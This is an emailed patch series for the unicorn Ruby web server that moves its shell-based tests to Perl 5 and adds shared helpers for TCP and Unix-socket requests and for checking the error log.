 test/exec/test_exec.rb | 24 ------------------------
 1 file changed, 24 deletions(-)

diff --git a/test/exec/test_exec.rb b/test/exec/test_exec.rb
index 1d3a0fd..55f828e 100644
--- a/test/exec/test_exec.rb
+++ b/test/exec/test_exec.rb
@@ -265,16 +265,6 @@ def test_exit_signals
     end
   end
 
-  def test_basic
-    File.open("config.ru", "wb") { |fp| fp.syswrite(HI) }
-    pid = fork do
-      redirect_test_io { exec($unicorn_bin, "-l", "#{@addr}:#{@port}") }
-    end
-    results = retry_hit(["http://#{@addr}:#{@port}/"])
-    assert_equal String, results[0].class
-    assert_shutdown(pid)
-  end
-
   def test_rack_env_unset
     File.open("config.ru", "wb") { |fp| fp.syswrite(SHOW_RACK_ENV) }
     pid = fork { redirect_test_io { exec($unicorn_bin, "-l#@addr:#@port") } }
@@ -638,20 +628,6 @@ def test_read_embedded_cli_switches
     assert_shutdown(pid)
   end
 
-  def test_config_ru_alt_path
-    config_path = "#{@tmpdir}/foo.ru"
-    File.open(config_path, "wb") { |fp| fp.syswrite(HI) }
-    pid = fork do
-      redirect_test_io do
-        Dir.chdir("/")
-        exec($unicorn_bin, "-l#{@addr}:#{@port}", config_path)
-      end
-    end
-    results = retry_hit(["http://#{@addr}:#{@port}/"])
-    assert_equal String, results[0].class
-    assert_shutdown(pid)
-  end
-
   def test_load_module
     libdir = "#{@tmpdir}/lib"
     FileUtils.mkpath([ libdir ])

[-- Attachment #14: 0013-tests-check_stderr-consistently-in-Perl-5-tests.patch --]
[-- Type: text/x-diff, Size: 2415 bytes --]

From cd7ee67fc8ebadec9bdd913d49ed3f214596ea47 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:42 +0000
Subject: [PATCH 13/23] tests: check_stderr consistently in Perl 5 tests

The Bourne shell tests did, so let's not let stuff sneak past us.
---
 t/active-unix-socket.t |  5 ++---
 t/integration.t        |  7 ++-----
 t/lib.perl             | 10 +++++++++-
 3 files changed, 13 insertions(+), 9 deletions(-)

diff --git a/t/active-unix-socket.t b/t/active-unix-socket.t
index 1241904..c132dc2 100644
--- a/t/active-unix-socket.t
+++ b/t/active-unix-socket.t
@@ -20,7 +20,7 @@ my $unix_req = sub {
 	print $fh <<EOM;
 pid "$tmpdir/u.pid"
 listen "$u1"
-stderr_path "$tmpdir/err1.log"
+stderr_path "$tmpdir/err.log"
 EOM
 	close $fh;
 
@@ -113,6 +113,5 @@ is($pidf, $to_kill{u1}, 'pid file contents unchanged after 2nd start failure');
 	ok(-S $u1, 'socket stays after SIGTERM');
 }
 
-my @log = slurp("$tmpdir/err.log");
-diag("@log") if $ENV{V};
+check_stderr;
 done_testing;
diff --git a/t/integration.t b/t/integration.t
index c687655..939dc24 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -246,11 +246,8 @@ EOM
 
 
 undef $ar;
-my @log = slurp("$tmpdir/err.log");
-diag("@log") if $ENV{V};
-my @err = grep(!/NameError.*Unicorn::Waiter/, grep(/error/i, @log));
-is_deeply(\@err, [], 'no unexpected errors in stderr');
-is_deeply([grep(/SIGKILL/, @log)], [], 'no SIGKILL in stderr');
+
+check_stderr;
 
 undef $tmpdir;
 done_testing;
diff --git a/t/lib.perl b/t/lib.perl
index 49632cf..315ef2d 100644
--- a/t/lib.perl
+++ b/t/lib.perl
@@ -11,12 +11,20 @@ use POSIX qw(dup2 _exit setpgid :signal_h SEEK_SET F_SETFD);
 use File::Temp 0.19 (); # 0.19 for ->newdir
 our ($tmpdir, $errfh);
 our @EXPORT = qw(unicorn slurp tcp_server tcp_connect unicorn $tmpdir $errfh
-	SEEK_SET tcp_host_port start_req which spawn);
+	SEEK_SET tcp_host_port start_req which spawn check_stderr);
 
 my ($base) = ($0 =~ m!\b([^/]+)\.[^\.]+\z!);
 $tmpdir = File::Temp->newdir("unicorn-$base-XXXX", TMPDIR => 1);
 open($errfh, '>>', "$tmpdir/err.log");
 
+sub check_stderr () {
+	my @log = slurp("$tmpdir/err.log");
+	diag("@log") if $ENV{V};
+	my @err = grep(!/NameError.*Unicorn::Waiter/, grep(/error/i, @log));
+	is_deeply(\@err, [], 'no unexpected errors in stderr');
+	is_deeply([grep(/SIGKILL/, @log)], [], 'no SIGKILL in stderr');
+}
+
 sub tcp_server {
 	my %opt = (
 		ReuseAddr => 1,

[-- Attachment #15: 0014-tests-consistent-tcp_start-and-unix_start-across-Per.patch --]
[-- Type: text/x-diff, Size: 8017 bytes --]

From 0dcd8bd569813a175ad43837db3ab07019a95b99 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:43 +0000
Subject: [PATCH 14/23] tests: consistent tcp_start and unix_start across Perl
 5 tests

I'll be using Unix sockets more in tests since there's no
risk of system-wide conflicts with TCP port allocation.
Furthermore, curl supports `--unix-socket' nowadays, so there's
little reason to rely on TCP sockets and the conflicts they
bring in tests.
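The `unix_start` helper this series standardizes on boils down to: connect a SOCK_STREAM Unix socket, write the request, return the handle. A self-contained Ruby sketch of a request over a Unix socket (the one-shot server thread stands in for a unicorn worker; the socket path is illustrative):

```ruby
require 'socket'
require 'tmpdir'

res = Dir.mktmpdir('unicorn-doc-') do |dir|
  path = File.join(dir, 'u1.sock') # no system-wide port to conflict over
  srv = UNIXServer.new(path)

  # one-shot server standing in for a unicorn worker
  th = Thread.new do
    c = srv.accept
    c.gets("\r\n\r\n") # consume the request head
    c.write "HTTP/1.0 200 OK\r\n\r\n#{Process.pid}\n"
    c.close
  end

  # the client side is what unix_start() does: connect + write the request
  c = UNIXSocket.new(path)
  c.write "GET /pid HTTP/1.0\r\n\r\n"
  out = c.read
  th.join
  out
end
puts res
```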
---
 t/active-unix-socket.t | 13 ++++---------
 t/integration.t        | 28 ++++++++++++++--------------
 t/lib.perl             | 30 ++++++++++++++++--------------
 3 files changed, 34 insertions(+), 37 deletions(-)

diff --git a/t/active-unix-socket.t b/t/active-unix-socket.t
index c132dc2..8723137 100644
--- a/t/active-unix-socket.t
+++ b/t/active-unix-socket.t
@@ -10,11 +10,6 @@ my %to_kill;
 END { kill('TERM', values(%to_kill)) if keys %to_kill }
 my $u1 = "$tmpdir/u1.sock";
 my $u2 = "$tmpdir/u2.sock";
-my $unix_req = sub {
-	my $s = IO::Socket::UNIX->new(Peer => shift, Type => SOCK_STREAM);
-	print $s @_, "\r\n\r\n";
-	$s;
-};
 {
 	open my $fh, '>', "$tmpdir/u1.conf.rb";
 	print $fh <<EOM;
@@ -53,7 +48,7 @@ is($?, 0, 'daemonized 1st process');
 chomp($to_kill{u1} = slurp("$tmpdir/u.pid"));
 like($to_kill{u1}, qr/\A\d+\z/s, 'read pid file');
 
-chomp(my $worker_pid = readline($unix_req->($u1, 'GET /pid')));
+chomp(my $worker_pid = readline(unix_start($u1, 'GET /pid')));
 like($worker_pid, qr/\A\d+\z/s, 'captured worker pid');
 ok(kill(0, $worker_pid), 'worker is kill-able');
 
@@ -65,7 +60,7 @@ isnt($?, 0, 'conflicting PID file fails to start');
 chomp(my $pidf = slurp("$tmpdir/u.pid"));
 is($pidf, $to_kill{u1}, 'pid file contents unchanged after start failure');
 
-chomp(my $pid2 = readline($unix_req->($u1, 'GET /pid')));
+chomp(my $pid2 = readline(unix_start($u1, 'GET /pid')));
 is($worker_pid, $pid2, 'worker PID unchanged');
 
 
@@ -73,7 +68,7 @@ is($worker_pid, $pid2, 'worker PID unchanged');
 unicorn('-c', "$tmpdir/u3.conf.rb", @uarg)->join;
 isnt($?, 0, 'conflicting UNIX socket fails to start');
 
-chomp($pid2 = readline($unix_req->($u1, 'GET /pid')));
+chomp($pid2 = readline(unix_start($u1, 'GET /pid')));
 is($worker_pid, $pid2, 'worker PID still unchanged');
 
 chomp($pidf = slurp("$tmpdir/u.pid"));
@@ -101,7 +96,7 @@ is($pidf, $to_kill{u1}, 'pid file contents unchanged after 2nd start failure');
 	chomp($to_kill{u1} = slurp("$tmpdir/u.pid"));
 	like($to_kill{u1}, qr/\A\d+\z/s, 'read pid file');
 
-	chomp($pid2 = readline($unix_req->($u1, 'GET /pid')));
+	chomp($pid2 = readline(unix_start($u1, 'GET /pid')));
 	like($pid2, qr/\A\d+\z/, 'worker running');
 
 	ok(kill('TERM', delete $to_kill{u1}), 'SIGTERM restarted daemon');
diff --git a/t/integration.t b/t/integration.t
index 939dc24..b33e3c3 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -70,7 +70,7 @@ EOM
 my ($c, $status, $hdr);
 
 # response header tests
-$c = start_req($srv, 'GET /rack-2-newline-headers HTTP/1.0');
+$c = tcp_start($srv, 'GET /rack-2-newline-headers HTTP/1.0');
 ($status, $hdr) = slurp_hdr($c);
 like($status, qr!\AHTTP/1\.[01] 200\b!, 'status line valid');
 my $orig_200_status = $status;
@@ -89,7 +89,7 @@ SKIP: { # Date header check
 };
 
 
-$c = start_req($srv, 'GET /rack-3-array-headers HTTP/1.0');
+$c = tcp_start($srv, 'GET /rack-3-array-headers HTTP/1.0');
 ($status, $hdr) = slurp_hdr($c);
 is_deeply([ grep(/^x-r3: /, @$hdr) ],
 	[ 'x-r3: a', 'x-r3: b', 'x-r3: c' ],
@@ -97,7 +97,7 @@ is_deeply([ grep(/^x-r3: /, @$hdr) ],
 
 SKIP: {
 	eval { require JSON::PP } or skip "JSON::PP missing: $@", 1;
-	my $c = start_req($srv, 'GET /env_dump');
+	my $c = tcp_start($srv, 'GET /env_dump');
 	my $json = do { local $/; readline($c) };
 	unlike($json, qr/^Connection: /smi, 'no connection header for 0.9');
 	unlike($json, qr!\AHTTP/!s, 'no HTTP/1.x prefix for 0.9');
@@ -107,17 +107,17 @@ SKIP: {
 }
 
 # cf. <CAO47=rJa=zRcLn_Xm4v2cHPr6c0UswaFC_omYFEH+baSxHOWKQ@mail.gmail.com>
-$c = start_req($srv, 'GET /nil-header-value HTTP/1.0');
+$c = tcp_start($srv, 'GET /nil-header-value HTTP/1.0');
 ($status, $hdr) = slurp_hdr($c);
 is_deeply([grep(/^X-Nil:/, @$hdr)], ['X-Nil: '],
 	'nil header value accepted for broken apps') or diag(explain($hdr));
 
 if ('TODO: ensure Rack::Utils::HTTP_STATUS_CODES is available') {
-	$c = start_req($srv, 'POST /tweak-status-code HTTP/1.0');
+	$c = tcp_start($srv, 'POST /tweak-status-code HTTP/1.0');
 	($status, $hdr) = slurp_hdr($c);
 	like($status, qr!\AHTTP/1\.[01] 200 HI\b!, 'status tweaked');
 
-	$c = start_req($srv, 'POST /restore-status-code HTTP/1.0');
+	$c = tcp_start($srv, 'POST /restore-status-code HTTP/1.0');
 	($status, $hdr) = slurp_hdr($c);
 	is($status, $orig_200_status, 'original status restored');
 }
@@ -130,12 +130,12 @@ SKIP: {
 }
 
 if ('bad requests') {
-	$c = start_req($srv, 'GET /env_dump HTTP/1/1');
+	$c = tcp_start($srv, 'GET /env_dump HTTP/1/1');
 	($status, $hdr) = slurp_hdr($c);
 	like($status, qr!\AHTTP/1\.[01] 400 \b!, 'got 400 on bad request');
 
-	$c = tcp_connect($srv);
-	print $c 'GET /';
+	$c = tcp_start($srv);
+	print $c 'GET /';
 	my $buf = join('', (0..9), 'ab');
 	for (0..1023) { print $c $buf }
 	print $c " HTTP/1.0\r\n\r\n";
@@ -143,7 +143,7 @@ if ('bad requests') {
 	like($status, qr!\AHTTP/1\.[01] 414 \b!,
 		'414 on REQUEST_PATH > (12 * 1024)');
 
-	$c = tcp_connect($srv);
+	$c = tcp_start($srv);
 	print $c 'GET /hello-world?a';
 	$buf = join('', (0..9));
 	for (0..1023) { print $c $buf }
@@ -152,7 +152,7 @@ if ('bad requests') {
 	like($status, qr!\AHTTP/1\.[01] 414 \b!,
 		'414 on QUERY_STRING > (10 * 1024)');
 
-	$c = tcp_connect($srv);
+	$c = tcp_start($srv);
 	print $c 'GET /hello-world#a';
 	$buf = join('', (0..9), 'a'..'f');
 	for (0..63) { print $c $buf }
@@ -173,7 +173,7 @@ SKIP: {
 	my $ck_hash = sub {
 		my ($sub, $path, %opt) = @_;
 		seek($rh, 0, SEEK_SET);
-		$c = tcp_connect($srv);
+		$c = tcp_start($srv);
 		$c->autoflush(0);
 		$PUT{$sub}->($rh, $c, $path, %opt);
 		$c->flush or die $!;
@@ -235,11 +235,11 @@ EOM
 	$wpid =~ s/\Apid=// or die;
 	ok(CORE::kill(0, $wpid), 'worker PID retrieved');
 
-	$c = start_req($srv, $req);
+	$c = tcp_start($srv, $req);
 	($status, $hdr) = slurp_hdr($c);
 	like($status, qr!\AHTTP/1\.[01] 200\b!, 'minimal request succeeds');
 
-	$c = start_req($srv, 'GET /xxxxxx HTTP/1.0');
+	$c = tcp_start($srv, 'GET /xxxxxx HTTP/1.0');
 	($status, $hdr) = slurp_hdr($c);
 	like($status, qr!\AHTTP/1\.[01] 413\b!, 'big request fails');
 }
diff --git a/t/lib.perl b/t/lib.perl
index 315ef2d..1d6e78d 100644
--- a/t/lib.perl
+++ b/t/lib.perl
@@ -10,8 +10,8 @@ use IO::Socket::INET;
 use POSIX qw(dup2 _exit setpgid :signal_h SEEK_SET F_SETFD);
 use File::Temp 0.19 (); # 0.19 for ->newdir
 our ($tmpdir, $errfh);
-our @EXPORT = qw(unicorn slurp tcp_server tcp_connect unicorn $tmpdir $errfh
-	SEEK_SET tcp_host_port start_req which spawn check_stderr);
+our @EXPORT = qw(unicorn slurp tcp_server tcp_start unicorn $tmpdir $errfh
+	SEEK_SET tcp_host_port which spawn check_stderr unix_start);
 
 my ($base) = ($0 =~ m!\b([^/]+)\.[^\.]+\z!);
 $tmpdir = File::Temp->newdir("unicorn-$base-XXXX", TMPDIR => 1);
@@ -55,26 +55,28 @@ sub tcp_host_port {
 	}
 }
 
-sub tcp_connect {
-	my ($dest, %opt) = @_;
-	my $addr = tcp_host_port($dest);
-	my $s = ref($dest)->new(
+sub unix_start ($@) {
+	my ($dst, @req) = @_;
+	my $s = IO::Socket::UNIX->new(Peer => $dst, Type => SOCK_STREAM) or
+		BAIL_OUT "unix connect $dst: $!";
+	$s->autoflush(1);
+	print $s @req, "\r\n\r\n" if @req;
+	$s;
+}
+
+sub tcp_start ($@) {
+	my ($dst, @req) = @_;
+	my $addr = tcp_host_port($dst);
+	my $s = ref($dst)->new(
 		Proto => 'tcp',
 		Type => SOCK_STREAM,
 		PeerAddr => $addr,
-		%opt,
 	) or BAIL_OUT "failed to connect to $addr: $!";
 	$s->autoflush(1);
+	print $s @req, "\r\n\r\n" if @req;
 	$s;
 }
 
-sub start_req {
-	my ($srv, @req) = @_;
-	my $c = tcp_connect($srv);
-	print $c @req, "\r\n\r\n";
-	$c;
-}
-
 sub slurp {
 	open my $fh, '<', $_[0];
 	local $/;

[-- Attachment #16: 0015-port-t9000-preread-input.sh-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 3856 bytes --]

From 1b8840d8d13491eecd2fa92e06f73c65eadd33ba Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:44 +0000
Subject: [PATCH 15/23] port t9000-preread-input.sh to Perl 5

Stuffing it into t/integration.t for now so we can save on
startup costs.
---
 t/integration.t          | 32 ++++++++++++++++++++++++---
 t/lib.perl               |  2 +-
 t/preread_input.ru       |  4 +---
 t/t9000-preread-input.sh | 48 ----------------------------------------
 4 files changed, 31 insertions(+), 55 deletions(-)
 delete mode 100755 t/t9000-preread-input.sh

diff --git a/t/integration.t b/t/integration.t
index b33e3c3..f5afd5d 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -7,8 +7,8 @@
 
 use v5.14; BEGIN { require './t/lib.perl' };
 use autodie;
-my $srv = tcp_server();
-my $host_port = tcp_host_port($srv);
+our $srv = tcp_server();
+our $host_port = tcp_host_port($srv);
 my $t0 = time;
 my $conf = "$tmpdir/u.conf.rb";
 open my $conf_fh, '>', $conf;
@@ -209,8 +209,34 @@ SKIP: {
 	seek($rh, 0, SEEK_SET);
 	$copt->{0} = $rh;
 	$do_curl->('-T-');
-}
 
+	diag 'testing Unicorn::PrereadInput...';
+	local $srv = tcp_server();
+	local $host_port = tcp_host_port($srv);
+	check_stderr;
+	truncate($errfh, 0);
+
+	my $pri = unicorn(qw(-E none t/preread_input.ru), { 3 => $srv });
+	$url = "http://$host_port/";
+
+	$do_curl->(qw(-T t/random_blob));
+	seek($rh, 0, SEEK_SET);
+	$copt->{0} = $rh;
+	$do_curl->('-T-');
+
+	my @pr_err = slurp("$tmpdir/err.log");
+	is(scalar(grep(/app dispatch:/, @pr_err)), 2, 'app dispatched twice');
+
+	# abort a chunked request by closing the socket early:
+	$c = tcp_start($srv, "PUT / HTTP/1.1\r\nTransfer-Encoding: chunked");
+	close $c;
+	@pr_err = slurp("$tmpdir/err.log");
+	is(scalar(grep(/app dispatch:/, @pr_err)), 2,
+			'app did not dispatch on aborted request');
+	undef $pri;
+	check_stderr;
+	diag 'Unicorn::PrereadInput middleware tests done';
+}
 
 # ... more stuff here
 
diff --git a/t/lib.perl b/t/lib.perl
index 1d6e78d..b6148cf 100644
--- a/t/lib.perl
+++ b/t/lib.perl
@@ -79,7 +79,7 @@ sub tcp_start ($@) {
 
 sub slurp {
 	open my $fh, '<', $_[0];
-	local $/;
+	local $/ if !wantarray;
 	readline($fh);
 }
 
diff --git a/t/preread_input.ru b/t/preread_input.ru
index 79685c4..f0a1748 100644
--- a/t/preread_input.ru
+++ b/t/preread_input.ru
@@ -1,8 +1,6 @@
 #\-E none
 require 'digest/sha1'
 require 'unicorn/preread_input'
-use Rack::ContentLength
-use Rack::ContentType, "text/plain"
 use Unicorn::PrereadInput
 nr = 0
 run lambda { |env|
@@ -13,5 +11,5 @@
     dig.update(buf)
   end
 
-  [ 200, {}, [ "#{dig.hexdigest}\n" ] ]
+  [ 200, {}, [ dig.hexdigest ] ]
 }
diff --git a/t/t9000-preread-input.sh b/t/t9000-preread-input.sh
deleted file mode 100755
index d6c73ab..0000000
--- a/t/t9000-preread-input.sh
+++ /dev/null
@@ -1,48 +0,0 @@
-#!/bin/sh
-. ./test-lib.sh
-t_plan 9 "PrereadInput middleware tests"
-
-t_begin "setup and start" && {
-	random_blob_sha1=$(rsha1 < random_blob)
-	unicorn_setup
-	unicorn  -D -c $unicorn_config preread_input.ru
-	unicorn_wait_start
-}
-
-t_begin "single identity request" && {
-	curl -sSf -T random_blob http://$listen/ > $tmp
-}
-
-t_begin "sha1 matches" && {
-	test x"$(cat $tmp)" = x"$random_blob_sha1"
-}
-
-t_begin "single chunked request" && {
-	curl -sSf -T- < random_blob http://$listen/ > $tmp
-}
-
-t_begin "sha1 matches" && {
-	test x"$(cat $tmp)" = x"$random_blob_sha1"
-}
-
-t_begin "app only dispatched twice" && {
-	test 2 -eq "$(grep 'app dispatch:' < $r_err | count_lines )"
-}
-
-t_begin "aborted chunked request" && {
-	rm -f $tmp
-	curl -sSf -T- < $fifo http://$listen/ > $tmp &
-	curl_pid=$!
-	kill -9 $curl_pid
-	wait
-}
-
-t_begin "app only dispatched twice" && {
-	test 2 -eq "$(grep 'app dispatch:' < $r_err | count_lines )"
-}
-
-t_begin "killing succeeds" && {
-	kill -QUIT $unicorn_pid
-}
-
-t_done

[-- Attachment #17: 0016-port-t-t0116-client_body_buffer_size.sh-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 8861 bytes --]

From e9593301044f305d4a0e074f77eea35015ca0ec4 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:45 +0000
Subject: [PATCH 16/23] port t/t0116-client_body_buffer_size.sh to Perl 5

While I'm fine with depending on curl for certain things,
there's no need for it here since unicorn has had lazy
rack.input for over a decade at this point.
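What "lazy rack.input" buys here can be sketched with a hypothetical
LazyInput class (an illustration only, not unicorn's actual
Unicorn::StreamInput/TeeInput implementation): bytes are pulled from the
client socket only when the app calls #read, so any plain test client
that writes the body itself is enough, and curl is unnecessary:

```ruby
require 'stringio'

# Hypothetical sketch of lazy input.  Nothing is consumed from the
# socket until the app asks for it via #read, and reads stop at the
# declared Content-Length.
class LazyInput
  def initialize(sock, content_length)
    @sock = sock
    @remain = content_length
  end

  def read(maxlen, buf = String.new)
    return nil if @remain.zero? # EOF per Content-Length
    chunk = @sock.read([maxlen, @remain].min, buf) or return nil
    @remain -= chunk.bytesize
    chunk
  end
end

# StringIO stands in for the client socket:
input = LazyInput.new(StringIO.new('hello world'), 5)
p input.read(4)  # => "hell"
p input.read(4)  # => "o"
p input.read(4)  # => nil
```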
---
 t/active-unix-socket.t                     |  1 +
 t/{t0116.ru => client_body_buffer_size.ru} |  2 -
 t/client_body_buffer_size.t                | 83 ++++++++++++++++++++++
 t/integration.t                            | 10 ---
 t/lib.perl                                 | 12 +++-
 t/t0116-client_body_buffer_size.sh         | 80 ---------------------
 6 files changed, 95 insertions(+), 93 deletions(-)
 rename t/{t0116.ru => client_body_buffer_size.ru} (82%)
 create mode 100644 t/client_body_buffer_size.t
 delete mode 100755 t/t0116-client_body_buffer_size.sh

diff --git a/t/active-unix-socket.t b/t/active-unix-socket.t
index 8723137..4e11837 100644
--- a/t/active-unix-socket.t
+++ b/t/active-unix-socket.t
@@ -109,4 +109,5 @@ is($pidf, $to_kill{u1}, 'pid file contents unchanged after 2nd start failure');
 }
 
 check_stderr;
+undef $tmpdir;
 done_testing;
diff --git a/t/t0116.ru b/t/client_body_buffer_size.ru
similarity index 82%
rename from t/t0116.ru
rename to t/client_body_buffer_size.ru
index fab5fce..44161a5 100644
--- a/t/t0116.ru
+++ b/t/client_body_buffer_size.ru
@@ -1,6 +1,4 @@
 #\ -E none
-use Rack::ContentLength
-use Rack::ContentType, 'text/plain'
 app = lambda do |env|
   input = env['rack.input']
   case env["PATH_INFO"]
diff --git a/t/client_body_buffer_size.t b/t/client_body_buffer_size.t
new file mode 100644
index 0000000..b1a99f3
--- /dev/null
+++ b/t/client_body_buffer_size.t
@@ -0,0 +1,83 @@
+#!perl -w
+# Copyright (C) unicorn hackers <unicorn-public@yhbt.net>
+# License: GPL-3.0+ <https://www.gnu.org/licenses/gpl-3.0.txt>
+
+use v5.14; BEGIN { require './t/lib.perl' };
+use autodie;
+my $uconf = "$tmpdir/u.conf.rb";
+
+open my $conf_fh, '>', $uconf;
+$conf_fh->autoflush(1);
+print $conf_fh <<EOM;
+client_body_buffer_size 0
+EOM
+my $srv = tcp_server();
+my $host_port = tcp_host_port($srv);
+my @uarg = (qw(-E none t/client_body_buffer_size.ru -c), $uconf);
+my $ar = unicorn(@uarg, { 3 => $srv });
+my ($c, $status, $hdr);
+my $mem_class = 'StringIO';
+my $fs_class = 'Unicorn::TmpIO';
+
+$c = tcp_start($srv, "PUT /input_class HTTP/1.0\r\nContent-Length: 0");
+($status, $hdr) = slurp_hdr($c);
+like($status, qr!\AHTTP/1\.[01] 200\b!, 'status line valid');
+is(readline($c), $mem_class, 'zero-byte file is StringIO');
+
+$c = tcp_start($srv, "PUT /tmp_class HTTP/1.0\r\nContent-Length: 1");
+print $c '.';
+($status, $hdr) = slurp_hdr($c);
+like($status, qr!\AHTTP/1\.[01] 200\b!, 'status line valid');
+is(readline($c), $fs_class, '1 byte file is filesystem-backed');
+
+
+my $fifo = "$tmpdir/fifo";
+POSIX::mkfifo($fifo, 0600) or die "mkfifo: $!";
+seek($conf_fh, 0, SEEK_SET);
+truncate($conf_fh, 0);
+print $conf_fh <<EOM;
+listen "$host_port" # TODO: remove this requirement for SIGHUP
+after_fork { |_,_| File.open('$fifo', 'w') { |fp| fp.write "pid=#\$\$" } }
+EOM
+$ar->do_kill('HUP');
+open my $fifo_fh, '<', $fifo;
+like(my $wpid = readline($fifo_fh), qr/\Apid=\d+\z/a ,
+	'reloaded w/ default client_body_buffer_size');
+
+
+$c = tcp_start($srv, "PUT /tmp_class HTTP/1.0\r\nContent-Length: 1");
+($status, $hdr) = slurp_hdr($c);
+like($status, qr!\AHTTP/1\.[01] 200\b!, 'status line valid');
+is(readline($c), $mem_class, 'class for a 1 byte file is memory-backed');
+
+
+my $one_meg = 1024 ** 2;
+$c = tcp_start($srv, "PUT /tmp_class HTTP/1.0\r\nContent-Length: $one_meg");
+($status, $hdr) = slurp_hdr($c);
+like($status, qr!\AHTTP/1\.[01] 200\b!, 'status line valid');
+is(readline($c), $fs_class, '1 megabyte file is FS-backed');
+
+# reload with bigger client_body_buffer_size
+say $conf_fh "client_body_buffer_size $one_meg";
+$ar->do_kill('HUP');
+open $fifo_fh, '<', $fifo;
+like($wpid = readline($fifo_fh), qr/\Apid=\d+\z/a ,
+	'reloaded w/ bigger client_body_buffer_size');
+
+
+$c = tcp_start($srv, "PUT /tmp_class HTTP/1.0\r\nContent-Length: $one_meg");
+($status, $hdr) = slurp_hdr($c);
+like($status, qr!\AHTTP/1\.[01] 200\b!, 'status line valid');
+is(readline($c), $mem_class, '1 megabyte file is now memory-backed');
+
+my $too_big = $one_meg + 1;
+$c = tcp_start($srv, "PUT /tmp_class HTTP/1.0\r\nContent-Length: $too_big");
+($status, $hdr) = slurp_hdr($c);
+like($status, qr!\AHTTP/1\.[01] 200\b!, 'status line valid');
+is(readline($c), $fs_class, '1 megabyte + 1 byte file is FS-backed');
+
+
+undef $ar;
+check_stderr;
+undef $tmpdir;
+done_testing;
diff --git a/t/integration.t b/t/integration.t
index f5afd5d..855c260 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -15,16 +15,6 @@ open my $conf_fh, '>', $conf;
 $conf_fh->autoflush(1);
 my $ar = unicorn(qw(-E none t/integration.ru -c), $conf, { 3 => $srv });
 my $curl = which('curl');
-END { diag slurp("$tmpdir/err.log") if $tmpdir };
-sub slurp_hdr {
-	my ($c) = @_;
-	local $/ = "\r\n\r\n"; # affects both readline+chomp
-	chomp(my $hdr = readline($c));
-	my ($status, @hdr) = split(/\r\n/, $hdr);
-	diag explain([ $status, \@hdr ]) if $ENV{V};
-	($status, \@hdr);
-}
-
 my %PUT = (
 	chunked_md5 => sub {
 		my ($in, $out, $path, %opt) = @_;
diff --git a/t/lib.perl b/t/lib.perl
index b6148cf..2685c3b 100644
--- a/t/lib.perl
+++ b/t/lib.perl
@@ -11,11 +11,12 @@ use POSIX qw(dup2 _exit setpgid :signal_h SEEK_SET F_SETFD);
 use File::Temp 0.19 (); # 0.19 for ->newdir
 our ($tmpdir, $errfh);
 our @EXPORT = qw(unicorn slurp tcp_server tcp_start unicorn $tmpdir $errfh
-	SEEK_SET tcp_host_port which spawn check_stderr unix_start);
+	SEEK_SET tcp_host_port which spawn check_stderr unix_start slurp_hdr);
 
 my ($base) = ($0 =~ m!\b([^/]+)\.[^\.]+\z!);
 $tmpdir = File::Temp->newdir("unicorn-$base-XXXX", TMPDIR => 1);
 open($errfh, '>>', "$tmpdir/err.log");
+END { diag slurp("$tmpdir/err.log") if $tmpdir };
 
 sub check_stderr () {
 	my @log = slurp("$tmpdir/err.log");
@@ -25,6 +26,15 @@ sub check_stderr () {
 	is_deeply([grep(/SIGKILL/, @log)], [], 'no SIGKILL in stderr');
 }
 
+sub slurp_hdr {
+	my ($c) = @_;
+	local $/ = "\r\n\r\n"; # affects both readline+chomp
+	chomp(my $hdr = readline($c));
+	my ($status, @hdr) = split(/\r\n/, $hdr);
+	diag explain([ $status, \@hdr ]) if $ENV{V};
+	($status, \@hdr);
+}
+
 sub tcp_server {
 	my %opt = (
 		ReuseAddr => 1,
diff --git a/t/t0116-client_body_buffer_size.sh b/t/t0116-client_body_buffer_size.sh
deleted file mode 100755
index c9e17c7..0000000
--- a/t/t0116-client_body_buffer_size.sh
+++ /dev/null
@@ -1,80 +0,0 @@
-#!/bin/sh
-. ./test-lib.sh
-t_plan 12 "client_body_buffer_size settings"
-
-t_begin "setup and start" && {
-	unicorn_setup
-	rtmpfiles unicorn_config_tmp one_meg
-	dd if=/dev/zero bs=1M count=1 of=$one_meg
-	cat >> $unicorn_config <<EOF
-after_fork do |server, worker|
-  File.open("$fifo", "wb") { |fp| fp.syswrite "START" }
-end
-EOF
-	cat $unicorn_config > $unicorn_config_tmp
-	echo client_body_buffer_size 0 >> $unicorn_config
-	unicorn -D -c $unicorn_config t0116.ru
-	unicorn_wait_start
-	fs_class=Unicorn::TmpIO
-	mem_class=StringIO
-
-	test x"$(cat $fifo)" = xSTART
-}
-
-t_begin "class for a zero-byte file should be StringIO" && {
-	> $tmp
-	test xStringIO = x"$(curl -T $tmp -sSf http://$listen/input_class)"
-}
-
-t_begin "class for a 1 byte file should be filesystem-backed" && {
-	echo > $tmp
-	test x$fs_class = x"$(curl -T $tmp -sSf http://$listen/tmp_class)"
-}
-
-t_begin "reload with default client_body_buffer_size" && {
-	mv $unicorn_config_tmp $unicorn_config
-	kill -HUP $unicorn_pid
-	test x"$(cat $fifo)" = xSTART
-}
-
-t_begin "class for a 1 byte file should be memory-backed" && {
-	echo > $tmp
-	test x$mem_class = x"$(curl -T $tmp -sSf http://$listen/tmp_class)"
-}
-
-t_begin "class for a random blob file should be filesystem-backed" && {
-	resp="$(curl -T random_blob -sSf http://$listen/tmp_class)"
-	test x$fs_class = x"$resp"
-}
-
-t_begin "one megabyte file should be filesystem-backed" && {
-	resp="$(curl -T $one_meg -sSf http://$listen/tmp_class)"
-	test x$fs_class = x"$resp"
-}
-
-t_begin "reload with a big client_body_buffer_size" && {
-	echo "client_body_buffer_size(1024 * 1024)" >> $unicorn_config
-	kill -HUP $unicorn_pid
-	test x"$(cat $fifo)" = xSTART
-}
-
-t_begin "one megabyte file should be memory-backed" && {
-	resp="$(curl -T $one_meg -sSf http://$listen/tmp_class)"
-	test x$mem_class = x"$resp"
-}
-
